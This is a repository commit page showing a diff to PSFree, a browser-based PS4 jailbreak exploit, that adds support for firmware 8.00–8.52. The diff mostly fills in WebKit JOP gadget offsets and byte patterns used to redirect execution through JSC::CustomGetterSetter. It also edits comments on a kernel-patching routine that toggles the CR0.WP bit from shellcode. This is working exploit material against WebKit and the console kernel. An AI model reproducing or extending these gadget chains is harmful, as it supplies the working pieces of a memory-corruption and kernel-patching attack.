zo0/PSFree-Enhanced-Dockerized
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

8.00-8.52 are now supported

Browse Source
This commit is contained in:
Al Azif
2025-06-03 17:01:27 -07:00
parent bcbca6a727
commit a74538dee4
6 changed files with 15 additions and 12 deletions
Download Patch File Download Diff File Expand all files Collapse all files

6
src/lapse.mjs
View File

@@ -64,6 +64,8 @@ const [is_ps4, version] = (() => {
throw RangeError(`invalid config.target: ${hex(value)}`);
}
log(`Console: PS${is_ps4 ? "4" : "5"} | Firmware: ${hex(version)}`);
return [is_ps4, version];
})();
@@ -1491,8 +1493,8 @@ async function get_binary(url) {
}
// Using JIT to load our own shellcode code here avoids the need to preform
// some trick toggle the CR0 Protection Mode bit. We can just toggle it easily
// within our shellcode.
// some trick toggle the CR0.WP bit. We can just toggle it easily within our
// shellcode.
async function patch_kernel(kbase, kmem, p_ucred, restore_info) {
if (!is_ps4) {
throw RangeError("ps5 kernel patching unsupported");

2
src/psfree.mjs
View File

@@ -60,6 +60,8 @@ const [is_ps4, version] = (() => {
throw RangeError(`invalid config.target: ${hex(value)}`);
}
log(`Console: PS${is_ps4 ? "4" : "5"} | Firmware: ${hex(version)}`);
return [is_ps4, version];
})();

3
src/rop/ps4/800.mjs
View File

@@ -61,7 +61,6 @@ call qword ptr [rax + 0x40]
`;
const jop4 = `
push rdx
mov edi, 0xac9784fe
jmp qword ptr [rax]
`;
const jop5 = "pop rsp; ret";
@@ -112,7 +111,7 @@ const webkit_gadget_offsets = new Map(
[jop1]: 0x0000000001988320, // `48 8b 7e 08 48 8b 07 ff 60 70`
[jop2]: 0x000000000076b970, // `55 48 89 e5 48 8b 07 ff 50 30`
[jop3]: 0x0000000000f62f95, // `48 8b 52 50 b9 0a 00 00 00 ff 50 40`
[jop4]: 0x00000000021af6ad, // `52 bf fe 84 97 ac ff 20`
[jop4]: 0x0000000001ef0d16, // `52 ff 20`
[jop5]: 0x00000000000bf669, // `5c c3`
}),
);

13
src/rop/ps4/850.mjs
View File

@@ -37,7 +37,7 @@ export let libkernel_base = null;
// libSceLibcInternal.sprx
export let libc_base = null;
// TODO: gadgets for the JOP chain
// gadgets for the JOP chain
//
// we'll use JSC::CustomGetterSetter.m_setter to redirect execution. its
// type is PutPropertySlot::PutValueFunc
@@ -61,7 +61,6 @@ call qword ptr [rax + 0x40]
`;
const jop4 = `
push rdx
mov edi, 0xac9784fe
jmp qword ptr [rax]
`;
const jop5 = "pop rsp; ret";
@@ -109,11 +108,11 @@ const webkit_gadget_offsets = new Map(
"mov dword ptr [rdi], eax; ret": 0x0000000000008e7f, // `89 07 c3`
"mov dword ptr [rax], esi; ret": 0x0000000000cf6c22, // `89 30 c3`
[jop1]: 0x0000000000000000, // ``
[jop2]: 0x0000000000000000, // ``
[jop3]: 0x0000000000000000, // ``
[jop4]: 0x0000000000000000, // ``
[jop5]: 0x0000000000000000, // ``
[jop1]: 0x00000000019881d0, // `48 8b 7e 08 48 8b 07 ff 60 70`
[jop2]: 0x00000000011c9df0, // `55 48 89 e5 48 8b 07 ff 50 30`
[jop3]: 0x000000000126c9c5, // `48 8b 52 50 b9 0a 00 00 00 ff 50 40`
[jop4]: 0x00000000021f3a2e, // `52 ff 20`
[jop5]: 0x0000000000073c2b, // `5c c3`
}),
);